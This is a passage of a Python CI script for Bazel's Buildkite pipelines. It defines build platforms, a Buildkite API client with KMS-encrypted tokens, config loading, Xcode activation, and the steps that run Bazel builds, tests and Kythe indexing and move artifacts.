"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/debian10-java11",
"python": "python3.7",
},
"debian11": {
"name": "Debian 11 Bullseye (OpenJDK 17, gcc 10.2.1)",
"emoji-name": ":debian: 11 Buster (OpenJDK 17, gcc 10.2.1)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/debian11-java17",
"python": "python3.9",
},
"ubuntu1604": {
"name": "Ubuntu 16.04 LTS (OpenJDK 8, gcc 5.4.0)",
"emoji-name": ":ubuntu: 16.04 LTS (OpenJDK 8, gcc 5.4.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
"ubuntu1804": {
"name": "Ubuntu 18.04 LTS (OpenJDK 11, gcc 7.4.0)",
"emoji-name": ":ubuntu: 18.04 LTS (OpenJDK 11, gcc 7.4.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["ubuntu1804"],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1804-java11",
"python": "python3.6",
},
"ubuntu2004": {
"name": "Ubuntu 20.04 LTS (OpenJDK 11, gcc 9.3.0)",
"emoji-name": ":ubuntu: 20.04 LTS (OpenJDK 11, gcc 9.3.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11",
"python": "python3.8",
},
"kythe_ubuntu2004": {
"name": "Kythe (Ubuntu 20.04 LTS, OpenJDK 11, gcc 9.3.0)",
"emoji-name": "Kythe (:ubuntu: 20.04 LTS, OpenJDK 11, gcc 9.3.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2004-java11-kythe",
"python": "python3.8",
},
"ubuntu2104": {
"name": "Ubuntu 21.04 (OpenJDK 11, gcc 10.3.0)",
"emoji-name": ":ubuntu: 21.04 (OpenJDK 11, gcc 10.3.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2104-java11",
"python": "python3",
},
"ubuntu2110": {
"name": "Ubuntu 21.10 (OpenJDK 17, gcc 11.2.0)",
"emoji-name": ":ubuntu: 21.10 (OpenJDK 11, gcc 11.2.0)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu2110-java17",
"python": "python3",
},
"macos": {
"name": "macOS (OpenJDK 11, Xcode)",
"emoji-name": ":darwin: (OpenJDK 11, Xcode)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos"],
"queue": "macos",
"python": "python3",
},
"macos_arm64": {
"name": "macOS arm64 (OpenJDK 8, Xcode)",
"emoji-name": ":darwin: arm64 (OpenJDK 8, Xcode)",
"downstream-root": "/Users/buildkite/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["macos_arm64"],
        # TODO(pcloudy): Switch to the macos_arm64 queue when Apple Silicon machines are available;
        # currently we just use x86_64 machines to cross-compile.
"queue": "macos",
"python": "python3",
},
"windows": {
"name": "Windows (OpenJDK 11, VS2017)",
"emoji-name": ":windows: (OpenJDK 11, VS2017)",
"downstream-root": "c:/b/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": ["windows"],
"queue": "windows",
"python": "python.exe",
},
"rbe_ubuntu1604": {
"name": "RBE (Ubuntu 16.04, OpenJDK 8)",
"emoji-name": "RBE (:ubuntu: 16.04, OpenJDK 8)",
"downstream-root": "/var/lib/buildkite-agent/builds/${BUILDKITE_AGENT_NAME}/${BUILDKITE_ORGANIZATION_SLUG}-downstream-projects",
"publish_binary": [],
"docker-image": f"gcr.io/{DOCKER_REGISTRY_PREFIX}/ubuntu1604-java8",
"python": "python3.6",
},
}
BUILDIFIER_DOCKER_IMAGE = "gcr.io/bazel-public/buildifier"
# The platform used for various steps (e.g. stuff that formerly ran on the "pipeline" workers).
DEFAULT_PLATFORM = "ubuntu1804"
# In order to test that "the one Linux binary" that we build for our official releases actually
# works on all Linux distributions that we test on, we use the Linux binary built on our official
# release platform for all Linux downstream tests.
LINUX_BINARY_PLATFORM = "centos7_java11_devtoolset10"
DEFAULT_XCODE_VERSION = "13.0"
XCODE_VERSION_REGEX = re.compile(r"^\d+\.\d+(\.\d+)?$")
XCODE_VERSION_OVERRIDES = {"10.2.1": "10.3", "11.2": "11.2.1", "11.3": "11.3.1"}
BUILD_LABEL_PATTERN = re.compile(r"^Build label: (\S+)$", re.MULTILINE)
BUILDIFIER_STEP_NAME = "Buildifier"
SKIP_TASKS_ENV_VAR = "CI_SKIP_TASKS"
CONFIG_FILE_EXTENSIONS = {".yml", ".yaml"}
KYTHE_DIR = "/usr/local/kythe"
INDEX_UPLOAD_POLICY_ALWAYS = "Always"
INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS = "IfBuildSuccess"
INDEX_UPLOAD_POLICY_NEVER = "Never"
class BuildkiteException(Exception):
"""
Raised whenever something goes wrong and we should exit with an error.
"""
pass
class BinaryUploadRaceException(Exception):
"""
Raised when try_publish_binaries wasn't able to publish a set of binaries,
because the generation of the current file didn't match the expected value.
"""
pass
class BuildkiteClient(object):
_ENCRYPTED_BUILDKITE_API_TOKEN = """
CiQA4DEB9ldzC+E39KomywtqXfaQ86hhulgeDsicds2BuvbCYzsSUAAqwcvXZPh9IMWlwWh94J2F
exosKKaWB0tSRJiPKnv2NPDfEqGul0ZwVjtWeASpugwxxKeLhFhPMcgHMPfndH6j2GEIY6nkKRbP
uwoRMCwe
""".strip()
_ENCRYPTED_BUILDKITE_API_TESTING_TOKEN = """
CiQAMTBkWjL1C+F5oon3+cC1vmum5+c1y5+96WQY44p0Lxd0PeASUQAy7iU0c6E3W5EOSFYfD5fA
MWy/SHaMno1NQSUa4xDOl5yc2kizrtxPPVkX4x9pLNuGUY/xwAn2n1DdiUdWZNWlY1bX2C4ex65e
P9w8kNhEbw==
""".strip()
_BUILD_STATUS_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}"
)
_NEW_BUILD_URL_TEMPLATE = "https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds"
_RETRY_JOB_URL_TEMPLATE = (
"https://api.buildkite.com/v2/organizations/{}/pipelines/{}/builds/{}/jobs/{}/retry"
)
def __init__(self, org, pipeline):
self._org = org
self._pipeline = pipeline
self._token = self._get_buildkite_token()
def _get_buildkite_token(self):
return decrypt_token(
encrypted_token=self._ENCRYPTED_BUILDKITE_API_TESTING_TOKEN
if THIS_IS_TESTING
else self._ENCRYPTED_BUILDKITE_API_TOKEN,
kms_key="buildkite-testing-api-token"
if THIS_IS_TESTING
else "buildkite-untrusted-api-token",
)
def _open_url(self, url, params=[]):
try:
params_str = "".join("&{}={}".format(k, v) for k, v in params)
return (
urllib.request.urlopen("{}?access_token={}{}".format(url, self._token, params_str))
.read()
.decode("utf-8", "ignore")
)
except urllib.error.HTTPError as ex:
raise BuildkiteException("Failed to open {}: {} - {}".format(url, ex.code, ex.reason))
def get_build_info(self, build_number):
"""Get build info for a pipeline with a given build number
See https://buildkite.com/docs/apis/rest-api/builds#get-a-build
Parameters
----------
build_number : the build number
Returns
-------
dict
the metadata for the build
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, build_number)
output = self._open_url(url)
return json.loads(output)
def get_build_info_list(self, params):
"""Get a list of build infos for this pipeline
See https://buildkite.com/docs/apis/rest-api/builds#list-builds-for-a-pipeline
Parameters
----------
params : the parameters to filter the result
Returns
-------
list of dict
the metadata for a list of builds
"""
url = self._BUILD_STATUS_URL_TEMPLATE.format(self._org, self._pipeline, "")
output = self._open_url(url, params)
return json.loads(output)
def get_build_log(self, job):
return self._open_url(job["raw_log_url"])
@staticmethod
def _check_response(response, expected_status_code):
if response.status_code != expected_status_code:
eprint("Exit code:", response.status_code)
eprint("Response:\n", response.text)
response.raise_for_status()
def trigger_new_build(self, commit, message=None, env={}):
"""Trigger a new build at a given commit and return the build metadata.
See https://buildkite.com/docs/apis/rest-api/builds#create-a-build
Parameters
----------
commit : the commit we want to build at
        message : the message to use as the build title
env : (optional) the environment variables to set
Returns
-------
dict
the metadata for the build
"""
url = self._NEW_BUILD_URL_TEMPLATE.format(self._org, self._pipeline)
data = {
"commit": commit,
"branch": "master",
"message": message if message else f"Trigger build at {commit}",
"env": env,
}
response = requests.post(url + "?access_token=" + self._token, json=data)
BuildkiteClient._check_response(response, requests.codes.created)
return json.loads(response.text)
def trigger_job_retry(self, build_number, job_id):
"""Trigger a job retry and return the job metadata.
See https://buildkite.com/docs/apis/rest-api/jobs#retry-a-job
Parameters
----------
build_number : the number of the build we want to retry
job_id : the id of the job we want to retry
Returns
-------
dict
the metadata for the job
"""
url = self._RETRY_JOB_URL_TEMPLATE.format(self._org, self._pipeline, build_number, job_id)
response = requests.put(url + "?access_token=" + self._token)
BuildkiteClient._check_response(response, requests.codes.ok)
return json.loads(response.text)
def wait_job_to_finish(self, build_number, job_id, interval_time=30, logger=None):
"""Wait a job to finish and return the job metadata
Parameters
----------
build_number : the number of the build we want to wait
job_id : the id of the job we want to wait
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the job
"""
t = 0
build_info = self.get_build_info(build_number)
while True:
for job in build_info["jobs"]:
if job["id"] == job_id:
state = job["state"]
if state != "scheduled" and state != "running" and state != "assigned":
return job
break
else:
raise BuildkiteException(
f"job id {job_id} doesn't exist in build " + build_info["web_url"]
)
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
def wait_build_to_finish(self, build_number, interval_time=30, logger=None):
"""Wait a build to finish and return the build metadata
Parameters
----------
build_number : the number of the build we want to wait
interval_time : (optional) the interval time to check the build status, default to 30s
logger : (optional) a logger to report progress
Returns
-------
dict
the latest metadata for the build
"""
t = 0
build_info = self.get_build_info(build_number)
while build_info["state"] == "scheduled" or build_info["state"] == "running":
url = build_info["web_url"]
if logger:
logger.log(f"Waiting for {url}, waited {t} seconds...")
time.sleep(interval_time)
t += interval_time
build_info = self.get_build_info(build_number)
return build_info
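# Decrypts a base64-encoded ciphertext by shelling out to `gcloud kms decrypt`
# (keyring "buildkite" in the bazel-untrusted project), feeding the ciphertext via
# stdin and returning the plaintext token as a stripped UTF-8 string.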
def decrypt_token(encrypted_token, kms_key):
return (
subprocess.check_output(
[
gcloud_command(),
"kms",
"decrypt",
"--project",
"bazel-untrusted",
"--location",
"global",
"--keyring",
"buildkite",
"--key",
kms_key,
"--ciphertext-file",
"-",
"--plaintext-file",
"-",
],
input=base64.b64decode(encrypted_token),
env=os.environ,
)
.decode("utf-8")
.strip()
)
def eprint(*args, **kwargs):
"""
Print to stderr and flush (just in case).
"""
print(*args, flush=True, file=sys.stderr, **kwargs)
def is_windows():
return os.name == "nt"
def gsutil_command():
return "gsutil.cmd" if is_windows() else "gsutil"
def gcloud_command():
return "gcloud.cmd" if is_windows() else "gcloud"
def downstream_projects_root(platform):
downstream_root = os.path.expandvars(PLATFORMS[platform]["downstream-root"])
if platform == "windows" and os.path.exists("d:/b"):
# If this is a Windows machine with a local SSD, the build directory is
# on drive D.
downstream_root = downstream_root.replace("c:/b/", "d:/b/")
if not os.path.exists(downstream_root):
os.makedirs(downstream_root)
return downstream_root
def fetch_configs(http_url, file_config):
"""
    If specified, fetches the build configuration from file_config or http_url; otherwise tries to
    read it from .bazelci/presubmit.yml.
Returns the json configuration as a python data structure.
"""
if file_config is not None and http_url is not None:
raise BuildkiteException("file_config and http_url cannot be set at the same time")
return load_config(http_url, file_config)
def load_config(http_url, file_config, allow_imports=True):
if http_url:
config = load_remote_yaml_file(http_url)
else:
file_config = file_config or ".bazelci/presubmit.yml"
with open(file_config, "r") as fd:
config = yaml.safe_load(fd)
# Legacy mode means that there is exactly one task per platform (e.g. ubuntu1604_nojdk),
# which means that we can get away with using the platform name as task ID.
# No other updates are needed since get_platform_for_task() falls back to using the
# task ID as platform if there is no explicit "platforms" field.
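    # For example (sketch), a legacy config such as
    #   platforms:
    #     ubuntu1804: {build_targets: ["//..."]}
    # is treated as
    #   tasks:
    #     ubuntu1804: {build_targets: ["//..."]}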
if "platforms" in config:
config["tasks"] = config.pop("platforms")
if "tasks" not in config:
config["tasks"] = {}
imports = config.pop("imports", None)
if imports:
if not allow_imports:
raise BuildkiteException("Nested imports are not allowed")
for i in imports:
imported_tasks = load_imported_tasks(i, http_url, file_config)
config["tasks"].update(imported_tasks)
return config
def load_remote_yaml_file(http_url):
with urllib.request.urlopen(http_url) as resp:
reader = codecs.getreader("utf-8")
return yaml.safe_load(reader(resp))
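# Imported task configs are namespaced by the import's base name: e.g. (sketch)
# importing "java_tools.yml" turns its task "windows" into "java_tools_windows",
# prefixes its name and working_directory with "java_tools", and defaults its
# platform to the original task id.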
def load_imported_tasks(import_name, http_url, file_config):
if "/" in import_name:
raise BuildkiteException("Invalid import '%s'" % import_name)
old_path = http_url or file_config
new_path = "%s%s" % (old_path[: old_path.rfind("/") + 1], import_name)
if http_url:
http_url = new_path
else:
file_config = new_path
imported_config = load_config(http_url=http_url, file_config=file_config, allow_imports=False)
namespace = import_name.partition(".")[0]
tasks = {}
for task_name, task_config in imported_config["tasks"].items():
fix_imported_task_platform(task_name, task_config)
fix_imported_task_name(namespace, task_config)
fix_imported_task_working_directory(namespace, task_config)
tasks["%s_%s" % (namespace, task_name)] = task_config
return tasks
def fix_imported_task_platform(task_name, task_config):
if "platform" not in task_config:
task_config["platform"] = task_name
def fix_imported_task_name(namespace, task_config):
old_name = task_config.get("name")
task_config["name"] = "%s (%s)" % (namespace, old_name) if old_name else namespace
def fix_imported_task_working_directory(namespace, task_config):
old_dir = task_config.get("working_directory")
task_config["working_directory"] = os.path.join(namespace, old_dir) if old_dir else namespace
def print_collapsed_group(name):
eprint("\n\n--- {0}\n\n".format(name))
def print_expanded_group(name):
eprint("\n\n+++ {0}\n\n".format(name))
def is_trueish(s):
return str(s).lower() in ["true", "1", "t", "y", "yes"]
def use_bazelisk_migrate():
"""
If USE_BAZELISK_MIGRATE is set, we use `bazelisk --migrate` to test incompatible flags.
"""
return is_trueish(os.environ.get("USE_BAZELISK_MIGRATE"))
def bazelisk_flags():
return ["--migrate"] if use_bazelisk_migrate() else []
def calculate_flags(task_config, task_config_key, action_key, tmpdir, test_env_vars):
include_json_profile = task_config.get("include_json_profile", [])
capture_corrupted_outputs = task_config.get("capture_corrupted_outputs", [])
json_profile_flags = []
json_profile_out = None
if action_key in include_json_profile:
json_profile_out = os.path.join(tmpdir, "{}.profile.gz".format(action_key))
json_profile_flags = ["--profile={}".format(json_profile_out)]
capture_corrupted_outputs_flags = []
capture_corrupted_outputs_dir = None
if action_key in capture_corrupted_outputs:
capture_corrupted_outputs_dir = os.path.join(
tmpdir, "{}_corrupted_outputs".format(action_key)
)
capture_corrupted_outputs_flags = [
"--experimental_remote_capture_corrupted_outputs={}".format(
capture_corrupted_outputs_dir
)
]
flags = task_config.get(task_config_key) or []
flags += json_profile_flags
flags += capture_corrupted_outputs_flags
# We have to add --test_env flags to `build`, too, otherwise Bazel
# discards its analysis cache between `build` and `test`.
if test_env_vars:
flags += ["--test_env={}".format(v) for v in test_env_vars]
return flags, json_profile_out, capture_corrupted_outputs_dir
def execute_commands(
task_config,
platform,
git_repository,
git_commit,
repo_location,
use_bazel_at_commit,
use_but,
save_but,
needs_clean,
build_only,
test_only,
monitor_flaky_tests,
incompatible_flags,
bazel_version=None,
):
# If we want to test incompatible flags, we ignore bazel_version and always use
# the latest Bazel version through Bazelisk.
if incompatible_flags:
bazel_version = None
if not bazel_version:
# The last good version of Bazel can be specified in an emergency file.
# However, we only use last_good_bazel for pipelines that do not
# explicitly specify a version of Bazel.
try:
emergency_settings = load_remote_yaml_file(EMERGENCY_FILE_URL)
bazel_version = emergency_settings.get("last_good_bazel")
except urllib.error.HTTPError:
# Ignore this error. The Setup step will have already complained about
# it by showing an error message.
pass
if build_only and test_only:
raise BuildkiteException("build_only and test_only cannot be true at the same time")
if use_bazel_at_commit and use_but:
raise BuildkiteException("use_bazel_at_commit cannot be set when use_but is true")
tmpdir = tempfile.mkdtemp()
sc_process = None
try:
if platform == "macos" or platform == "macos_arm64":
activate_xcode(task_config)
# If the CI worker runs Bazelisk, we need to forward all required env variables to the test.
# Otherwise any integration test that invokes Bazel (=Bazelisk in this case) will fail.
test_env_vars = ["LocalAppData"] if platform == "windows" else ["HOME"]
# CI should have its own user agent so that we can remove it from Bazel download statistics.
os.environ["BAZELISK_USER_AGENT"] = "Bazelisk/BazelCI"
test_env_vars.append("BAZELISK_USER_AGENT")
if repo_location:
os.chdir(repo_location)
elif git_repository:
clone_git_repository(git_repository, platform, git_commit)
# We use one binary for all Linux platforms (because we also just release one binary for all
# Linux versions and we have to ensure that it works on all of them).
binary_platform = platform if platform in ["macos", "windows"] else LINUX_BINARY_PLATFORM
if use_bazel_at_commit:
print_collapsed_group(":gcloud: Downloading Bazel built at " + use_bazel_at_commit)
bazel_binary = download_bazel_binary_at_commit(
tmpdir, binary_platform, use_bazel_at_commit
)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
elif use_but:
print_collapsed_group(":gcloud: Downloading Bazel Under Test")
bazel_binary = download_bazel_binary(tmpdir, binary_platform)
os.environ["USE_BAZEL_VERSION"] = bazel_binary
else:
bazel_binary = "bazel"
if bazel_version:
os.environ["USE_BAZEL_VERSION"] = bazel_version
if "USE_BAZEL_VERSION" in os.environ and not task_config.get(
"skip_use_bazel_version_for_test", False
):
# This will only work if the bazel binary in $PATH is actually a bazelisk binary
# (https://github.com/bazelbuild/bazelisk).
test_env_vars.append("USE_BAZEL_VERSION")
for key, value in task_config.get("environment", {}).items():
# We have to explicitly convert the value to a string, because sometimes YAML tries to
# be smart and converts strings like "true" and "false" to booleans.
os.environ[key] = os.path.expandvars(str(value))
# Set BAZELISK_SHUTDOWN to 1 when we use bazelisk --migrate on Windows.
# This is a workaround for https://github.com/bazelbuild/continuous-integration/issues/1012
if use_bazelisk_migrate() and platform == "windows":
os.environ["BAZELISK_SHUTDOWN"] = "1"
cmd_exec_func = execute_batch_commands if platform == "windows" else execute_shell_commands
cmd_exec_func(task_config.get("setup", None))
# Allow the config to override the current working directory.
required_prefix = os.getcwd()
requested_working_dir = os.path.abspath(task_config.get("working_directory", ""))
if os.path.commonpath([required_prefix, requested_working_dir]) != required_prefix:
raise BuildkiteException("working_directory refers to a path outside the workspace")
os.chdir(requested_working_dir)
if platform == "windows":
execute_batch_commands(task_config.get("batch_commands", None))
else:
execute_shell_commands(task_config.get("shell_commands", None))
bazel_version = print_bazel_version_info(bazel_binary, platform)
print_environment_variables_info()
if incompatible_flags:
print_expanded_group("Build and test with the following incompatible flags:")
for flag in incompatible_flags:
eprint(flag + "\n")
execute_bazel_run(
bazel_binary, platform, task_config.get("run_targets", None), incompatible_flags
)
if needs_clean:
execute_bazel_clean(bazel_binary, platform)
build_targets, test_targets, index_targets = calculate_targets(
task_config, platform, bazel_binary, build_only, test_only
)
if build_targets:
(
build_flags,
json_profile_out_build,
capture_corrupted_outputs_dir_build,
) = calculate_flags(task_config, "build_flags", "build", tmpdir, test_env_vars)
try:
release_name = get_release_name_from_branch_name()
execute_bazel_build(
bazel_version,
bazel_binary,
platform,
build_flags
+ (
["--stamp", "--embed_label=%s" % release_name]
if save_but and release_name
else []
),
build_targets,
None,
incompatible_flags,
)
if save_but:
upload_bazel_binary(platform)
finally:
if json_profile_out_build:
upload_json_profile(json_profile_out_build, tmpdir)
if capture_corrupted_outputs_dir_build:
upload_corrupted_outputs(capture_corrupted_outputs_dir_build, tmpdir)
if test_targets:
test_flags, json_profile_out_test, capture_corrupted_outputs_dir_test = calculate_flags(
task_config, "test_flags", "test", tmpdir, test_env_vars
)
if not is_windows():
# On platforms that support sandboxing (Linux, MacOS) we have
# to allow access to Bazelisk's cache directory.
# However, the flag requires the directory to exist,
# so we create it here in order to not crash when a test
# does not invoke Bazelisk.
bazelisk_cache_dir = get_bazelisk_cache_directory(platform)
os.makedirs(bazelisk_cache_dir, mode=0o755, exist_ok=True)
test_flags.append("--sandbox_writable_path={}".format(bazelisk_cache_dir))
test_bep_file = os.path.join(tmpdir, "test_bep.json")
upload_thread = threading.Thread(
target=upload_test_logs_from_bep, args=(test_bep_file, tmpdir, binary_platform, monitor_flaky_tests)
)
try:
upload_thread.start()
try:
execute_bazel_test(
bazel_version,
bazel_binary,
platform,
test_flags,
test_targets,
test_bep_file,
monitor_flaky_tests,
incompatible_flags,
)
finally:
if json_profile_out_test:
upload_json_profile(json_profile_out_test, tmpdir)
if capture_corrupted_outputs_dir_test:
upload_corrupted_outputs(capture_corrupted_outputs_dir_test, tmpdir)
finally:
upload_thread.join()
if index_targets:
(
index_flags,
json_profile_out_index,
capture_corrupted_outputs_dir_index,
) = calculate_flags(task_config, "index_flags", "index", tmpdir, test_env_vars)
index_upload_policy = task_config.get("index_upload_policy", "IfBuildSuccess")
index_upload_gcs = task_config.get("index_upload_gcs", False)
try:
                should_upload_kzip = index_upload_policy == INDEX_UPLOAD_POLICY_ALWAYS
try:
execute_bazel_build_with_kythe(
bazel_version,
bazel_binary,
platform,
index_flags,
index_targets,
None,
incompatible_flags,
)
if index_upload_policy == INDEX_UPLOAD_POLICY_IF_BUILD_SUCCESS:
should_upload_kzip = True
except subprocess.CalledProcessError as e:
# If not running with Always policy, raise the build error.
if index_upload_policy != INDEX_UPLOAD_POLICY_ALWAYS:
handle_bazel_failure(e, "build")
if should_upload_kzip and not is_pull_request():
try:
merge_and_upload_kythe_kzip(platform, index_upload_gcs)
except subprocess.CalledProcessError:
raise BuildkiteException("Failed to upload kythe kzip")
finally:
if json_profile_out_index:
upload_json_profile(json_profile_out_index, tmpdir)
if capture_corrupted_outputs_dir_index:
upload_corrupted_outputs(capture_corrupted_outputs_dir_index, tmpdir)
finally:
terminate_background_process(sc_process)
if tmpdir:
shutil.rmtree(tmpdir)
def activate_xcode(task_config):
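    """
    Activates the Xcode version requested via the task's "xcode_version" field on this macOS
    machine, falling back to the default version if the requested one is not installed.
    """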
# Get the Xcode version from the config.
wanted_xcode_version = task_config.get("xcode_version", DEFAULT_XCODE_VERSION)
print_collapsed_group(":xcode: Activating Xcode {}...".format(wanted_xcode_version))
# Ensure it's a valid version number.
if not isinstance(wanted_xcode_version, str):
raise BuildkiteException(
"Version number '{}' is not a string. Did you forget to put it in quotes?".format(
wanted_xcode_version
)
)
if not XCODE_VERSION_REGEX.match(wanted_xcode_version):
raise BuildkiteException(
"Invalid Xcode version format '{}', must match the format X.Y[.Z].".format(
wanted_xcode_version
)
)
# This is used to replace e.g. 11.2 with 11.2.1 without having to update all configs.
xcode_version = XCODE_VERSION_OVERRIDES.get(wanted_xcode_version, wanted_xcode_version)
# This falls back to a default version if the selected version is not available.
supported_versions = sorted(
# Stripping "Xcode" prefix and ".app" suffix from e.g. "Xcode12.0.1.app" leaves just the version number.
[os.path.basename(x)[5:-4] for x in glob("/Applications/Xcode*.app")],
reverse=True,
)
if xcode_version not in supported_versions:
xcode_version = DEFAULT_XCODE_VERSION
if xcode_version != wanted_xcode_version:
print_collapsed_group(
":xcode: Fixed Xcode version: {} -> {}...".format(wanted_xcode_version, xcode_version)
)
lines = [
"Your selected Xcode version {} was not available on the machine.".format(
wanted_xcode_version
),
"Bazel CI automatically picked a fallback version: {}.".format(xcode_version),
"Available versions are: {}.".format(supported_versions),
]
execute_command(
[
"buildkite-agent",
"annotate",
"--style=warning",
"\n".join(lines),
"--context",
"ctx-xcode_version_fixed",
]
)
# Check that the selected Xcode version is actually installed on the host.
xcode_path = "/Applications/Xcode{}.app".format(xcode_version)
if not os.path.exists(xcode_path):
raise BuildkiteException("Xcode not found at '{}'.".format(xcode_path))
# Now activate the specified Xcode version and let it install its required components.
# The CI machines have a sudoers config that allows the 'buildkite' user to run exactly
# these two commands, so don't change them without also modifying the file there.
execute_command(["/usr/bin/sudo", "/usr/bin/xcode-select", "--switch", xcode_path])
execute_command(["/usr/bin/sudo", "/usr/bin/xcodebuild", "-runFirstLaunch"])
def get_bazelisk_cache_directory(platform):
# The path relies on the behavior of Go's os.UserCacheDir()
# and of the Go version of Bazelisk.
cache_dir = "Library/Caches" if platform == "macos" else ".cache"
return os.path.join(os.environ.get("HOME"), cache_dir, "bazelisk")
def current_branch_is_main_branch():
return os.getenv("BUILDKITE_BRANCH") in ("master", "stable", "main")
def get_release_name_from_branch_name():
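    """
    Extracts the release name (e.g. "5.0.0rc2") from branch names such as "release-5.0.0rc2";
    returns an empty string for non-release branches.
    """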
res = re.match(r"release-(\d+\.\d+\.\d+(rc\d+)?).*", os.getenv("BUILDKITE_BRANCH"))
return res.group(1) if res else ""
def is_pull_request():
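    """A non-empty BUILDKITE_PULL_REQUEST_REPO means that this build was triggered by a pull request."""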
third_party_repo = os.getenv("BUILDKITE_PULL_REQUEST_REPO", "")
return len(third_party_repo) > 0
def print_bazel_version_info(bazel_binary, platform):
print_collapsed_group(":information_source: Bazel Info")
version_output = execute_command_and_get_output(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "version"]
)
execute_command(
[bazel_binary]
+ common_startup_flags(platform)
+ ["--nomaster_bazelrc", "--bazelrc=/dev/null", "info"]
)
match = BUILD_LABEL_PATTERN.search(version_output)
return match.group(1) if match else "unreleased binary"
def print_environment_variables_info():
print_collapsed_group(":information_source: Environment Variables")
for key, value in os.environ.items():
eprint("%s=(%s)" % (key, value))
def upload_bazel_binary(platform):
print_collapsed_group(":gcloud: Uploading Bazel Under Test")
if platform == "windows":
binary_dir = r"bazel-bin\src"
binary_name = r"bazel.exe"
binary_nojdk_name = r"bazel_nojdk.exe"
else:
binary_dir = "bazel-bin/src"
binary_name = "bazel"
binary_nojdk_name = "bazel_nojdk"
execute_command(["buildkite-agent", "artifact", "upload", binary_name], cwd=binary_dir)
execute_command(["buildkite-agent", "artifact", "upload", binary_nojdk_name], cwd=binary_dir)
def merge_and_upload_kythe_kzip(platform, index_upload_gcs):
print_collapsed_group(":gcloud: Uploading kythe kzip")
kzips = glob("bazel-out/*/extra_actions/**/*.kzip", recursive=True)
build_number = os.getenv("BUILDKITE_BUILD_NUMBER")
git_commit = os.getenv("BUILDKITE_COMMIT")
final_kzip_name = "{}-{}-{}.kzip".format(build_number, platform, git_commit)
execute_command([f"{KYTHE_DIR}/tools/kzip", "merge", "--output", final_kzip_name] + kzips)
execute_command(["buildkite-agent", "artifact", "upload", final_kzip_name])
if index_upload_gcs:
pipeline = os.getenv("BUILDKITE_PIPELINE_SLUG")
destination = KZIPS_BUCKET + pipeline + "/" + final_kzip_name
print("Uploading to GCS {}".format(destination))
execute_command([gsutil_command(), "cp", final_kzip_name, destination])
def download_binary(dest_dir, platform, binary_name):
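    """
    Downloads the named binary artifact from this build's platform-specific Bazel build step via
    buildkite-agent and marks it as executable.
    """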
source_step = create_label(platform, "Bazel", build_only=True)
execute_command(
["buildkite-agent", "artifact", "download", binary_name, dest_dir, "--step", source_step]
)
bazel_binary_path = os.path.join(dest_dir, binary_name)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary(dest_dir, platform):
binary_name = "bazel.exe" if platform == "windows" else "bazel"
return download_binary(dest_dir, platform, binary_name)
def download_bazel_nojdk_binary(dest_dir, platform):
binary_name = "bazel_nojdk.exe" if platform == "windows" else "bazel_nojdk"
return download_binary(dest_dir, platform, binary_name)
def download_binary_at_commit(
dest_dir, platform, bazel_git_commit, bazel_binary_url, bazel_binary_path
):
try:
execute_command([gsutil_command(), "cp", bazel_binary_url, bazel_binary_path])
except subprocess.CalledProcessError as e:
raise BuildkiteException(
"Failed to download Bazel binary at %s, error message:\n%s" % (bazel_git_commit, str(e))
)
st = os.stat(bazel_binary_path)
os.chmod(bazel_binary_path, st.st_mode | stat.S_IEXEC)
return bazel_binary_path
def download_bazel_binary_at_commit(dest_dir, platform, bazel_git_commit):
url = bazelci_builds_gs_url(platform, bazel_git_commit)
path = os.path.join(dest_dir, "bazel.exe" if platform == "windows" else "bazel")
